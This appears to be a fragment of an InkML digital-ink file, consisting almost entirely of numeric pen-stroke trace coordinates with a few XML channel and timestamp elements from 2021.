16,17 0-1,-17 0 1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5:54:32.6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98 988 0,'18'0'16,"-36"53"-16,-17 0 15,-18 35-15,0 18 16,-35 52-16,18-34 15,17-36-15,-35 18 16,-36 17-16,18-17 16,0 35-16,-17-17 15,-1-1-15,36-17 16,18-18 0,17-17-16,0 17 15,35-17-15,-17-18 16,17-1-16,1 1 15,17-17-15,-18-1 16,18 18-16,0 0 16,0 17-16,53-17 15,70 0-15,71-35 16,18 17-16,88 0 16,35-35-16,-53 0 15,18 0-15,-53 0 16,-35 0-16,-36 0 15,-70-17-15,-35-36 16,-36 0-16,0-35 16,-17-53-16,-18-53 15,0 35-15,-88-71 16,-54 36-16,-52-53 16,-35 18-16,-88-53 15,123 141-15,-106-36 16,106 54-16,-18-1 15,71 54 1,-18-18-16,71 52 16,0-16-16,0 16 15,35 19-15,17 17 16,1 0-16,-18 0 16,18 17-16,-53 36 15,35 18-15,-18 17 16,18 35-16,0 19 15,36 69-15,-36 19 16,53-1-16,0 0 16,0-17-16,53-18 15,17 0-15,19-53 16,-19-35-16,18-18 16,0-53-16,-35-17 15,0-18-15,18 0 16,35-53-16,0-35 15,-1 0-15,1-18 16,106-106 0,-89 89-16,-17-19 15,0 19-15,-35-18 16,-1-18-16,1 18 16,-18 0-16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05.94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63 12577 0,'0'-18'78,"0"0"-63,18 18 17,-18-17-32,18 17 0,-1 0 31,1 0-15,35 0-16,-18 0 15,18-18-15,35 18 16,1 0-1,-1 0-15,18 0 0,17 0 16,-35 0 0,89 0-1,-19 0 1,-69 0 31,-72 0-47,1 0 15,-1-18 1,1 1 0,17 17 15,-17 0-15,35 0-1,-18-18 1,89 0-1,-36 18 17,-53 0-17,-17 0 110,-1 0-93,1 0 14,0 0 1,-1 0 16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09.82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609 12418 0,'18'0'110,"-1"0"-110,19 0 15,17-18-15,0 18 16,17 0-16,1-18 15,-1 18 1,36-17-16,35 17 16,-70 0-1,52 0 1,18 0 0,-123-35-1,0 35-15,17 0 16,0 0-16,-17 0 15,-1 0-15,19 0 16,17 0-16,0 0 16,-18 0-16,0 0 15,0 0-15,18 0 16,35 0 0,-17 0-1,17 0 16,-70 0-31,0 0 0,-1 0 16,18-18-16,1 18 16,17 0-1,0 0-15,17 0 16,1 0-16,34 0 16,1 0-16,-17 0 15,16 0-15,-16 0 16,16 0-16,-34 0 15,88 0 1,-89 0-16,-17 0 16,0 0-16,0 0 15,-18 0-15,1 0 16,-19 0-16,1 0 16,17 0-1,-17 0 1,-1 0-1,1 0 17,0 0-17,-1 0 1,89 0 0,-53 0-1,53 18 1,53-1-1,-106 1 1,52-1 0,54-17-1,-106 0 1,18 0 0,17 0-1,-71 0 1,1 0-1,17-17 1,-17 17 15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11.8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522 4445 0,'18'0'32,"0"0"-17,-1 0-15,1 0 16,0 0-16,34 0 16,1 0-16,177 0 31,-160 0-31,1 0 15,-1 0-15,-17 0 16,53 0 0,-35 0-1,34 0 1,-34 0 0,-53 0-1,-1 0 1,36 0-1,-35 0 1,35 0 0,0 0-1,-36 0 1,1 0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13.28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33 4586 0,'-53'0'63,"-17"0"-48,-36 0-15,-35 0 16,17 18 0,1-1-16,-18 1 0,17 0 15,-70-1 1,124 1 0,52-18-1,0 0 63,1 0-62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15.4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731 4657 0,'0'-18'62,"18"0"-30,17 18-17,18-35-15,0 35 16,53-18 0,53 1-1,-4216 17 1,8167 0-1,-4093 0 235,1 0-203,-1 0-31,1 0-16,35 0 16,-18 0-16,36 0 15,-18 0 1,0 0-16,0 0 0,-1 0 15,-16 0-15,-4076 0 16,8168 0 0,-4058 0-1,1 0 1,-18 0 0,18 0-1,-36 0-15,35 17 16,-34-17-1,-1 0 1,-17 0 0,-1 0-1,18 0 1,-17 0 0,0 0-1,17 0 1,0 0-1,-17 0 1,0 18 0,-1 0-1,1-18 17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18.2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294 4551 0,'0'0'0,"18"-18"16,0 18 46,-1 0-46,18 0 0,18 0-16,0 0 15,88 0 1,53 0-1,71 0 1,-4128 0 0,8149 0-1,-4197 0-15,-1 0 16,0 0 0,-53 0-1,-17-17 1,0 17-1,-1-18-15,1 18 0,17 0 16,36-18 0,17 1-1,0-1 1,-70 18 0,17 0-1,-17 0 1,17 0-1,0 0 1,18-18-16,53 18 16,-36 0-1,1 0-15,17 0 16,-35 0-16,-18 0 16,36 0-16,-18 0 15,0 0-15,0 0 16,0 0-16,-36 0 15,1 0-15,0 0 16,-1 0 0,1 0 46,-1 0-62,1 0 16,17 0-16,-4092 0 15,8150 0-15,-4058 0 16,35 0-16,72 0 16,-72 0-1,1 0-15,-1 0 16,18 0 0,-17 0-16,35 0 15,70 0 1,-4092 0-1,8097 0 1,-4111 0 0,-52 0 93,0 0-93,17 0-16,0 0 15,18 0 1,0 0-16,53 0 16,17 18-1,18 0 1,-123-18-1,17 0-15,18 0 16,-17 0 0,-19 0-16,36 17 15,0-17 1,-18 0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32.61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20 9119 0,'0'0'0,"-36"0"15,19 0-15,-36 0 16,0 0-16,0 0 15,18 0-15,-36 0 16,36 0-16,-18 0 16,18 0-16,-18 0 15,18 0-15,-1 0 16,1 0-16,17 0 16,-17 0-16,0 0 15,0 0-15,-1 0 16,19 18-1,-1-18-15,-17 0 16,17 0-16,-17 0 16,17 18-16,1-18 15,-1 0 1,-17 0-16,-18 17 16,-36 1-1,-16 0 1,34-18-1,18 17 1,18 1 0,0-18-1,17 17 1,-17 1 0,-18-18-1,-4145 18 1,8184-18-1,-4056 17 1,34-17-16,1 0 16,17 0-16,1 0 15,-1 18 1,-35-18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34.81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25 9102 0,'0'0'0,"106"0"0,-18 0 16,106 0-1,-88 0-15,-18 0 16,-17 0 0,140 0-1,-140 0 1,-18 0-16,-18 0 15,71-18 1,-89 18 0,54-18-1,17 18 1,-4110 0 0,8185 0-1,-3951 0 1,-142 0-1,36 0 1,71 0 0,-142 0-1,18 0 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0:25.6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754 11793,'36'0,"0"0,0 0,1 0,17 0,1 0,-19 0,18 0,-17 0,-1 0,18 0,-17 0,-1 0,-18 0,0 0,37 0,-37 0,18 0,-18 0,0 0,0 0,19 0,-19 0,0 0,0 0,18 0,1 0,-1 0,-18 0,18 0,1 0,17 0,-36 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,19 0,-19 0,0 0,18 18,1-18,-19 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,18 0,-18 0,18 0,-17 0,-1 0,18 0,-18 18,0-18,0 0,1 0,-1 0,0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36.3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864 9243 0,'0'-18'78,"18"1"-62,17-1 0,-17 18-16,35 0 0,-18 0 15,35-18 1,89 1-1,-106 17 1,71-18 0,-19 18-1,-87-18 1,0 18 140,-1 0-140,1 0-1,0 0 1,-1 0-16,1 0 0,-4057 0 16,8201 0-1,-4144 0 1,17 0-16,-17 0 16,17 0-1,-17 0 1,-1 0-1,1 0 1,17 0-16,1 0 16,-1 0-16,-17 0 15,35 0 1,-36 0-16,18 0 16,-17 0-16,0 0 15,-1 0 1,1 0-1,0 0 64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0:37.4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57 9190 0,'36'0'15,"-19"0"16,36 0-31,-18 0 0,1 0 16,17 0-16,0 0 16,35 0-1,0 0-15,18 0 16,176 0 0,71 0-1,35 0 1,18 0-1,-71 0 1,-88 0 0,-159 0-16,-18 0 15,-34 0 1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1:10.1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87 4516 0,'0'0'0,"35"0"16,1 0-1,-1 0-15,18 0 16,0 0-16,0 0 15,17 0-15,36 0 16,-53 0 0,53 0-1,-35 0 1,-54 0 0,1 0-1,-1 0 32,19 0-31,-19 0-1,19 0-15,-1 0 16,-17 0-16,34 0 16,-16 0-1,122 0 1,1 0 15,-106-18-31,0 18 0,0 0 16,18-18-1,-1 1-15,1 17 16,211-36 0,-141 36 15,-70 0-31,-19 0 0,1 0 15,0 0-15,0 0 16,-35 0-16,17 0 16,-17 0-16,-1 0 15,1 0 1,0 0 0,17 0-1,-17 0 16,-1-17-31,1 17 16,17 0 0,-17-18-1,17 18 1,71 0 0,17 0-1,-52 0-15,35 0 16,-36 0-16,1 0 15,123 0 1,-124 0-16,-17 0 16,18 0-16,-36 0 15,18 0 1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1:12.6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34 6050 0,'0'0'0,"18"-18"15,-1 18 1,1-17 0,0 17-16,17 0 15,0 0 1,0 0-16,1 0 0,17 0 15,0 0 1,17 0-16,1 0 16,17 0-16,35 0 15,1 0-15,35 0 16,35 0-16,-36 0 16,-17 0-16,1 0 15,122 0 1,212 0 15,-211 0-15,-159 0-1,264 0 1,-158 0 0,-124 0-1,18 0-15,-18 0 16,-17 0-16,123 0 15,-106 0 1,-18 0-16,-17 0 16,53 0-16,-53 0 15,-18 0 1,18 0-16,0 0 16,0 0-16,-18 0 15,18 0-15,-35 0 16,17 0-16,1 0 15,16 0-15,54 0 16,-53 0 0,18 0-16,-18 0 15,0 0-15,-18 0 16,18 0-16,-36 0 16,1 0-16,0 0 15,17 0-15,-17 0 16,-1 0-16,19 0 15,-19 0-15,36 0 16,0 0-16,0 0 16,-18 0-1,-17 0-15,35 0 16,-36 0 15,1 0-31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1:28.5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883 7444 0,'18'0'62,"-1"0"-46,19 0-16,-19 0 16,19 0-16,-1 0 31,-17 0-31,-1 0 0,1 0 15,-1 0-15,1 0 79,0 0-79,-1 0 15,1 0-15,35 0 31,-18 0-31,-17 0 16,0 0-16,17 0 16,18 0-1,-18 0-15,0 0 16,18 0-16,0 0 16,71 0-1,-19 0-15,-16 0 16,16 0-16,-16 0 15,34 0-15,-52 0 16,17 0 0,88 0-1,-17 0 1,0 0 0,0 0-1,105 0 1,-158 0-1,53 0 1,-18 0 0,-53 0-16,-17 0 15,-19 0-15,-16 0 16,17 0 0,-36 0-16,1 0 203,0 0-188,-1 0-15,1 0 16,17 0 0,0 0-16,1 0 15,-1 0-15,-17 0 16,-1 0-1,1 0 1,0 0 15,-1 0 16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1:54.6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960 7267 0,'18'18'94,"17"-18"-94,18 0 15,18 0-15,-1 0 16,54 0-1,-89 0 1,18 0 0,-18 0-1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1:56.38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68 8749 0,'-17'-18'16,"-1"18"46,0 0-46,1 0-1,-1 0-15,-17 0 16,-18 0 0,-71 0-1,-369-17 32,334-1-47,18 18 16,-106 0-1,53-18 1,35 1 0,71-1-16,-36 0 15,-52-17 1,35 35-1,88 0 1,35 0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10.11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842 1799 0,'18'0'78,"17"0"-62,1 0-1,-1 0-15,18 0 16,0 0-16,106 0 16,-89 0-1,142 0 1,158 0-1,-282 0 1,124 0 0,53 0-1,-160 0 1,54 0 0,106 0-1,-159 0 1,123 0-1,88 0 17,-17 0-17,-35 0 1,176 0 15,-318 0-31,18 0 0,-17 0 16,-1 0-16,-17 0 15,0 0 1,0 0-16,0 0 16,-18 0-16,-18 0 15,-17 0-15,0 0 16,-17 0-16,-1 0 16,-18 0 62,19 0-63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11.2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699 4251 0,'35'0'62,"18"0"-62,35 0 16,36 0-16,34 0 15,36 0-15,36 0 16,-1 53-16,18-53 16,212 0-1,-265 18-15,-36-18 16,-17 0-16,-70 0 15,35 0 1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13.5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520 4427 0,'17'0'47,"1"18"-47,17-18 15,18 0-15,0 18 16,53-1-1,158 19 1,160-1 0,-4358-35-1,8220 0 1,-4056 0 0,-54 0-1,-141 17 1,-17-17-1,0 0 95,-1 0-95,1 0 1,0 0 0,-1 0-16,-17-17 15,18 17-15,0 0 32,-1 0-17,1-18-15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80" units="cm"/>
          <inkml:channel name="Y" type="integer" max="1050" units="cm"/>
        </inkml:traceFormat>
        <inkml:channelProperties>
          <inkml:channelProperty channel="X" name="resolution" value="37.75281" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="37.76978" units="1/cm"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2021-10-19T01:30:58.25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415 7257,'18'0,"19"18,-19-18,36 0,1 0,-1 0,37 0,18 0,36 0,-36 0,54 0,0 0,-36 0,18 0,19 0,-1 0,-36 0,0 37,-36-37,-1 0,1 0,-18 0,-1 0,1 0,-19 0,1 0,-1 0,-18 0,19 0,-19 0,0 0,-18 0,1 0,-1 0,0 0,0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16.2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00 4586 0,'18'0'46,"17"0"-30,35 0-16,19-18 16,-1 1-16,35-1 15,36 18 1,-18-17-16,53-1 16,159 0-1,35 18 1,0 0-1,-71 0 1,1 0 0,-53 18-1,-54 0 1,-52-1 0,-18 1-1,-17 35 1,-36-36-1,-18-17 1,19 18 0,-1-18-1,0 0 1,-35 0 0,17 0-1,-52 0 1,0 0 46,-1 0-46,-17 18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17.9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716 12382 0,'0'-17'15,"18"-1"32,35 18-31,35 0-16,71 0 15,35 0-15,70 0 16,19 0-16,105 0 16,88 0-16,0 0 15,-141 0-15,-70 0 16,-36 0-16,-52 0 31,-195 0-15,-17 0-1,-89 35 1,107-35 0,-1 0-16,36 0 109,35 0-93,0 0-16,17 0 15,54 0-15,228-17 16,-175 17 0,299 0-1,565 0 1,-600 0-1,282 0 1,106-18 0,-653 18-1,124 18 1,-212-18 0,-105 0 124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22.62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09 7567 0,'0'0'0,"18"0"16,17 0-16,18 0 16,18 0-16,35 0 15,-18-18-15,35 1 16,-17 17-16,35 0 15,-4109 0-15,8201-18 16,-4127 18-16,229 0 31,-229 0-31,-18 0 16,0 0-16,36 0 16,-3987 0-1,8061 0 1,-4022 0-1,-105 0-15,-36 0 16,-17 0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26.0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962 9313 0,'0'0'0,"35"0"15,1 0-15,-1 0 16,18 0-16,0 0 16,0 0-16,17 0 15,36 0-15,17 18 16,19-18-16,228 35 31,-176-35-31,18 0 0,17 0 16,0 0-16,1 0 15,-19 0 1,-34 0-16,-19 0 16,-17 0-16,-17 0 0,-36 0 15,-35 0 1,-18 0-16,-17 0 15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26.74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29 8996 0,'17'35'32,"19"-17"-17,16-1-15,37 1 16,16 0-16,54-1 16,-18-17-16,18 0 15,0 0-15,-3705 0 31,7780 0-31,-4146 0 16,-18 0-16,-17 0 16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27.1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851 9119 0,'0'18'31,"35"-18"-15,18 0-16,-18 0 0,18 18 16,0-18-16,106 17 15,-36-17 1,1 0-16,-1 0 15,36 0-15,0 0 16,-1 0 0,36 0-16,-35 0 0,-35 0 15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2:51.9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8 4427 0,'0'-17'15,"17"17"1,1 0 0,35 0-16,-18 0 15,1 0-15,16 0 16,1 0-16,18 0 15,-1 0-15,36 0 16,18 17-16,-36-17 16,53 0-16,0 18 15,-17-18-15,17 0 16,-18 0-16,-35 0 16,36 0-16,-36 0 15,18 0-15,-18 18 16,18-1-16,-53-17 15,0 0-15,0 18 16,0 0-16,0-18 16,17 17-16,-17-17 15,-18 0 1,18 18-16,18-1 0,-36 1 16,0-18-16,-17 0 31,0 0-16,-1 0 1,1 18 0,0-18-16,17 0 15,-18 0 1,19 0-16,-1 0 16,-17 0-16,35 0 15,-18 0-15,88 17 31,-87-17-15,-19 18-16,1-18 16,35 0-16,-18 0 15,0 0 1,36 18 0,35-1-1,-71-17 1,71 18-1,176 17 1,-176-17 0,35-18-1,35 0 1,-140 0 0,-1 0-1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3:01.77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777 5927 0,'-17'0'15,"-1"0"48,-35 0-48,0 0-15,0 0 16,0 0-16,1 0 16,-37 0-1,-52 0 1,-88 0 0,141 0-1,-18 0 1,-18 0-1,1 17 32,105-17-47,-4074 0 16,8114 0 0,-4093 18-1,-17-18 16,-53 0-15,88 0 0,0 0-16,18 0 15,-18 0-15,0 0 16,0 0-16,-18 0 16,1 0-16,-1 0 15,1 0-15,-1 0 16,1 0-1,-1 0-15,18 0 0,0 0 16,18 0 0,0 0-16,-1 0 15,1 0-15,0 0 16,0 0-16,-18 0 16,17 0-16,19 0 15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3:04.5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441 7302 0,'17'0'109,"36"0"-109,-17 0 16,17 0-16,-18 0 15,35 0-15,-17 0 16,0 0-16,124 53 31,-36-35-15,-88-18 15,0 0-31,-36 0 16,1 0-16,0 0 15,-1 0 1,54 0-1,-1 0 17,-34 0-32,-19 0 0,36 0 15,-4092 0 1,8149 0-16,-4075 0 0,0 0 16,18 0-16,53 0 31,35 0-16,106 18 1,18 17 0,-18 0-1,-36 1 1,-17-19 0,-35 18-1,-53-35 1,0 36-1,-18-19 1,-18-17 0,-34 0-1,-19 0 1,1 0 46,0 0-46,-1 0 0,1 0-16,0 0 31,-1 0 16,1 0 15,-1 0-30,1 0-17,-18-17 1,18 17 62,-18-18-62,17 0-1,-17 1 1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3:06.70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863 8855 0,'18'0'0,"-1"0"15,1-18 1,-1 18 0,19 0-1,-1 0-15,0 0 16,36 0 0,-1 0-16,36 0 15,18 0-15,140 0 16,-140 0-1,17 0-15,-35 0 16,35 0-16,0 0 16,18 0-16,-53 0 15,17 0-15,-35 0 16,159 0 0,-194 0-1,0 0-15,-18 0 16,1-18-16,-19 18 15,1 0-15,-1 0 16,1 0 0,0 0-16,35 0 15,0 0-15,-1 0 16,107 0 0,71 0 15,-178 0-31,1 0 0,-17 0 15,-19 0-15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6:59.13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03 7005 0,'20'0'156,"0"0"-125,0 0-15,-20-20 0,19 20-1,41 0-15,-20 0 16,-20 0-16,59 0 15,-20 0-15,41 0 16,19 0-16,40 0 16,-40 0-16,-80 0 15,100 0-15,20 0 16,-20 39-16,20 1 16,39 0-1,-19-20-15,-21 39 16,41-59-16,-40 20 15,-21-20-15,-38 0 16,-61 0-16,1 0 16,-20 0-16,0 0 15,0 0 204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3:13.38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304 300 0,'0'0'0,"0"18"0,-35 17 15,17-18-15,-53 36 16,-70 124-1,53-71-15,-35 35 16,-18 53-16,17-18 16,-70 36-16,53-36 15,-18 1-15,0-19 16,18-87-16,-35 17 16,88-35-16,-18 0 15,53 0-15,18-36 16,17 1-16,18 0 15,0-1 1,0 1 0,18 17-16,70 1 15,124 52 1,17-18 0,529 71-1,1130 106 1,-1183-158-1,-70-19-15,-158-70 16,-89 0-16,-177 0 16,-105 0-16,-88 0 31,-36-35-31,-211-106 16,52 53-1,-34 17-15,-1-35 16,-17-17-16,-106-89 15,-36 0-15,-52 1 16,-53-89-16,52 18 16,-175-36-16,210 71 15,-34 18-15,53 17 16,-1 0-16,195 107 16,52 87-16,54 18 15,52 0-15,1 0 16,70 35 78,-1 89-94,19 70 0,35 53 15,-36 35-15,54 106 16,35 194-1,-54-123-15,72 35 16,-107-36-16,19-70 16,-19-17-16,-35-54 15,18-88-15,-35-17 16,17-18 0,18 353-1,-53-406 1,0 0-16,0-53 15,0-35-15,0-17 0,18-1 16,17-35 47,-35-53-48,0-35-15,35-89 16,36-193-1,-36 123 1,0-194 0,18-353-1,-53 441 1,0-370 0,0 194-16,0-194 15,-17 423 1,-19-17-1,19 123 1,-4058 176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3:15.5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51 1023 0,'0'53'31,"-53"-18"-31,0 18 15,-106 35-15,18-17 16,-53 52-16,-335 213 16,141-54-1,-635 529 1,-230 71 0,513-370 15,722-301-16,194-105 1,530 229 0,334-88-1,-757-247 1,-19 18-16,-17-18 16,18 0-16,-36 0 15,36 0-15,-89 0 16,18 0-1,-70-53-15,-54 0 16,-52 35-16,-1-52 16,-4091-54-16,8148-34 15,-4091-1-15,-36-35 16,-53-18-16,-17-52 16,-89-54-16,-17-35 15,-1 53-15,1-35 16,-53-53-16,88 106 15,-53-35-15,53 70 16,70 53-16,-17-1 16,18 37-1,70 87-15,35 18 0,1 53 16,17-17-16,0 87 47,0 107-47,88 140 15,53 124-15,0 88 16,-18 71-16,36 70 16,229 671-1,-194-689 1,194 266 0,-105-460-1,-231-405 1,-34-18-1,-18-17 1,0-36 47,0-34-63,0-72 15,0-52-15,0-548 16,0 142-1,0-423 1,0-18 0,0 758-1,0 36-15,0 53 16,18-1-16,-1 89 16,1 0-16,-18 53 15,18 35-15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4:52.9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46 4410 0,'18'0'16,"-1"-18"-16,19 18 16,-1 0-1,88 0 1,-17 0-16,71 0 16,-54 0-1,71 0 1,-35 0-1,-89 0 17,-34 0-17,-19 0-15,1 0 16,17 0 0,18-18-16,-18 18 15,1 0 1,-19 0-16,1 0 0,0 0 15,-1 0 1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4:55.3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932 4674 0,'35'0'47,"-17"0"-32,35 0-15,-18 0 16,18 0-16,-18 0 15,1 0 1,-19 0-16,19 0 16,-19 0 31,1 0-32,0-17-15,-1 17 16,18 0-16,1 0 15,-19 0-15,19 0 16,-1 0-16,18 0 16,-36 0-16,19 0 15,-1 0-15,0 0 16,53 0 0,54 0 15,-107 0-31,0 0 0,0 0 15,1 0-15,17 0 16,-18 0-16,0 0 16,0 0-16,1 0 15,-1 0-15,-17 0 16,35 0-16,-18 0 16,18 0-16,-18 0 15,36 0-15,-19 0 16,1 0-16,36 0 15,-36 0-15,17 0 16,1 0-16,-18 0 16,-1 0-1,1 0-15,36 0 16,-36 0 0,35 0-1,-35 0-15,88 0 31,-71 0-31,1 0 16,-3969 0 0,8043 0-1,-3828 0 1,-211 0 0,141 0-1,-71 0-15,177 0 16,-229 0-16,-36 0 15,0 0 1,71 0 0,-106 0-1,-18 0-15,18 0 16,35 0 0,-53 0-1,1 0-15,-19 0 16,1 0-16,0 0 15,-1 0 1,1 0 0,17 0-1,-17 0 1,17 0-16,0 0 16,1 0-16,17 0 15,-1-18-15,-16 18 16,-1 0-16,18 0 15,0 0-15,-18 0 16,18 0-16,-18 0 16,18 0-16,18 0 15,-1 0-15,36 0 16,-35 0-16,17 0 16,106 0-1,71 0 16,-195 0-31,1 0 0,-18 0 16,70-35-16,-35 35 16,-35 0-16,0 0 15,0 0-15,0 0 16,-18 0-16,36 0 16,-18 0-1,0 0-15,0 0 16,-18 0-16,18 0 15,-18 0-15,-17 0 16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12.1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619 10266 0,'17'0'31,"19"0"-16,16 0-15,-16 0 16,34 0-16,36 0 16,18 0-16,17 0 15,0 0-15,18 0 16,-1 0-16,19 0 16,-19 0-16,1 0 15,-18 0-15,18 17 16,-35 1-16,-19 0 15,1-1-15,-35 1 16,-18-18-16,0 18 16,-36-18 31,-17 17-32,18-17 16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32.89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602 8608 0,'18'0'78,"17"0"-78,1 17 16,16-17-16,37 18 15,158 17 1,-142-17 15,-16-18-31,-36 18 16,-18-18-16,0 0 15,18 17-15,-18-17 16,89 0 0,140 0 15,-175 0-31,-37 0 0,19 0 15,0 0-15,-18 0 16,17 0-16,-17 0 16,0 0-16,0 0 15,0 0-15,17 0 16,18 0 0,18 18-16,-18-18 15,36 18-15,-1-1 0,-34 1 16,-19-18-1,18 0-15,-52 0 16,17 0-16,-36 0 16,1 0-16,0 0 31,-1 0-15,1 0-1,-1 0 1,1 0-1,17 17 1,54 1 0,52 0 15,-88-1-15,246 1-1,-210-18 1,-19 18-16,18-18 15,-35 0-15,0 17 16,-18-17 15,1 18-15,-36 0 218,0-1-156,0 1-62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35.53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4446 8837 0,'18'0'16,"35"0"-16,0 0 15,0 0 1,17 0-16,-17 0 0,18 0 16,-1 0-1,-35 0-15,1 0 16,-19 0-16,1 0 15,0 0 1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36.90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433 8855 0,'17'0'125,"19"0"-125,-1 0 15,0 0-15,0 0 16,18 0-16,0 0 16,18 0-16,-1 0 15,1 0-15,-1 0 16,107 0 0,-124 0-1,70 0 1,-70 0-16,0 0 15,35 0-15,-17 0 0,140 0 32,-87 0-32,-1 0 15,19 0-15,-37 0 16,19 0-16,-1 0 16,-34 17-16,34-17 15,53 18 1,107 35 15,-178-53-15,1 18-1,-53-1 1,0 1-16,88-18 16,-88 0-16,0 0 15,0 0 1,0 17-16,88 1 15,-35 0 1,70 17 0,-88-17-16,71-1 15,-88 1-15,-1-18 16,212 35 15,-229-17-31,36 0 16,-36-18-16,-1 17 15,1-17 1,-35 0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38.2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05 10213 0,'18'0'31,"70"0"-15,35 0-16,18 0 0,36 0 15,17 0 1,18 0-16,-18 18 16,-36-1-16,195-17 31,-212 0-31,-17 0 0,-1 0 16,106 0-1,-105 0-15,-1 0 16,-17 0-16,35 0 15,-17 0-15,17 0 16,-35 0 0,105 0-1,-175 0 1,-1 0-16,0 0 16,36 0-1,-18 0 1,53 0-1,176 53 1,-159-35 0,107-1-1,-36-17 1,-177 0 0,-4074 0-1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39.23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761 10178 0,'88'-18'32,"18"18"-17,35-18-15,0 1 16,53-1-16,194 0 15,-211 18 1,211 0 0,70 0-1,-4426 0 1,8166 0-16,-4075 0 16,1 0-16,-36 0 15,18 18-15,88 0 16,-106-18-1,18 17-15,-36-17 16,-17 0-16,-17 0 16,-19 0-1,1 0-15,-18 18 125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1.37255" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="40.15686" units="1/cm"/>
          <inkml:channelProperty channel="T" name="resolution" value="1" units="1/dev"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2021-07-26T01:27:00.23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5815 6826 0,'20'0'47,"0"0"-47,0 0 15,40 0-15,19 0 16,40 0-16,20 0 16,0 0-16,0 0 15,-20 0-15,20 0 16,-60 0-16,60 0 15,-40 0-15,20 0 16,20 0-16,20 0 16,19 0-16,-138 0 15,139 0-15,39 0 16,20 0-16,-59 0 16,39 0-16,-59 0 15,0 0-15,-21 0 16,21 0-1,0 0-15,-40 0 16,40 0-16,39 0 16,-19 0-16,-1 0 15,21 0-15,-40-20 16,-21 20-16,-78 0 16,59 0-16,20 0 15,-20 0-15,0 0 16,-40 0-16,-19 0 15,0 0-15,-1 0 16,-19 0-16,19 0 16,-19 0-16,0 0 15,-1 0-15,1 0 16,-20 0 15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40.92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602 10372 0,'0'-18'62,"0"0"-15,18 1-47,0 17 16,34-18-16,-34 18 15,35 0-15,-18 0 16,36 0-16,35 0 16,-1 0-16,19 0 15,17 0-15,53 0 16,-35 0-1,35 0-15,-35 18 0,-18-1 16,-18-17-16,-35 0 16,1 0-1,-37 0-15,-16 0 16,-1 0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42.9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63 11642 0,'35'0'94,"0"0"-79,36 17-15,70-17 16,18 0-16,35 0 15,0 0-15,-18 0 16,-35 0-16,106 36 16,-141-36-1,-35 0-15,-19 17 16,-16-17-16,-19 18 16,19-18-16,-19 0 15,1 0-15,0 0 16,-1 0-1,1 0-15,-1 0 16,19 0 0,-1 0-1,71 18 17,-53-18-32,-18 0 15,0 0-15,1 0 0,-1 0 16,0 0-1,0 0-15,-17 0 16,0 0-16,-1 0 16,19 0-16,-4093 0 15,8149 0-15,-4057 0 16,-17 0-16,-1 17 16,19-17-16,-19 18 15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5:46.89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281 1005 0,'-18'36'47,"-52"-1"-32,-1 36-15,-35 17 0,-17 18 16,-18 17-1,-283 159 1,-740 371 15,758-459-31,-17 18 0,159-89 16,70-52-16,70-1 16,71-17-16,0-18 15,53 36 1,124 70 15,17-106-31,70-17 0,-16-18 16,16 0-16,-52 0 15,0 0-15,-18 0 16,35 0-16,-35 0 16,0 0-16,1 0 15,-37-53 1,19 0-16,-18 0 0,-53-17 15,-1 34-15,-16-69 16,-19-19-16,1-35 16,-18-70-16,0-36 15,-71-34 1,-34-54-16,-1-18 16,35 124-16,1 0 15,17 53-15,-18 53 16,54 53-16,-19 35 15,36 36-15,0 105 47,0 53-47,0 88 16,0 53 0,0 1359-1,-88-953 1,-141 1040-1,17 601 1,212-1994 0,0-318-1,0-52 1,0-71 0,71-105-1,264-971 1,-4180 670-1,8360-493 1,-3827-336 0,-529 953-1,52-211 1,-175 352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05.15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933 13317 0,'-35'0'0,"0"0"16,-18 0-16,0 0 16,0 0-16,-18 0 15,-34 0-15,-1 0 16,-35 0-16,-36 0 16,36 0-16,0 0 15,0 0-15,0 0 16,17 0-16,19 0 15,-19 0-15,-88 0 32,107 0-32,-1 0 0,0 0 15,0 0-15,0 0 16,-17 0 0,35 0-16,-36 0 15,36 0-15,-36 0 16,36 0-16,-53 0 15,18 0-15,34 0 16,-34 0-16,17 0 16,18 0-16,0 0 15,0 0-15,17 0 16,18 0-16,0 0 16,0 0-16,0 0 15,-35 0 1,0-17-16,-18-1 0,-17 18 15,17 0-15,-35 0 16,-36 0 0,-175 0-1,-72 0 1,283 0 0,-88 0-1,-195 0 1,283 0-1,-35 0-15,17 0 16,-388 0 0,406 0-1,-141 0 1,-35 18 0,228-18-1,-105 35 1,18-35-1,141 0 1,-1 0 0,-16 0-1,34 18 1,-17-18 0,-1 0-1,1 0 1,0 0-16,-18 17 15,0-17-15,-18 0 16,18 18-16,-70 0 16,70-1-1,0-17-15,18 0 16,0 0-16,-1 0 16,1 18-16,17-18 15,-17 17-15,17-17 16,1 0-16,-1 0 15,-17 18 1,17-18-16,-35 0 16,18 0-16,0 0 15,0 0-15,17 0 16,-17 0-16,17 0 16,0 0-1,1 0-15,-1 0 16,-211 0-1,-124 0 17,230 0-32,-19 0 15,37 18-15,52-18 16,17 0-16,19 0 16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06.85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433 14534 0,'0'0'0,"17"0"0,1 0 15,17 0 1,18 0-16,53 18 31,-71-18-15,71 18-1,176-1 1,-158 1 0,158 0-1,159 35 1,-282-36-1,105 18 1,177 18 0,-35-17 15,-88-1-15,-177-17-16,-35-18 15,52 17-15,-70 1 16,195 17-1,-230-17 1,35-18 0,18 0-1,-71 0-15,0 0 16,18 0-16,-18 0 16,106 0-1,-105 0 1,34 0-16,19 0 15,-54 0-15,35 0 16,19 0-16,-1 0 16,0 0-16,18 0 15,17 0-15,18 0 16,-35 0 0,18 0-16,-1 0 0,18 0 15,0 0-15,-17 0 16,-18 0-1,0 0-15,-36 0 16,1 0-16,-1 0 16,1 0-16,-18 0 15,194 0 1,-89 0 15,1 0-31,-71 0 16,0 0-16,-35 0 15,18 0-15,-18 0 16,0 0-16,-18 0 16,0 0-16,18 0 15,-35 0 1,52 0-16,-17 0 0,0 0 16,53-18-16,-18-17 15,18 17-15,0 1 16,-18-1-16,89 0 15,34 1 17,-105 17-17,53 0 1,52 0 0,19 0-1,-36-18 1,-18 18-1,18 0 1,-17 0 0,-19 0-1,1 0 1,-88 0-16,-18 0 16,-1 0-16,1 0 15,-17 0-15,34 0 16,-34 0-1,16 0 1,-34 0 0,0 0-1,17 0 1,0 0 0,-17 0 15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09.6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86 13229 0,'0'0'0,"-17"0"31,-19 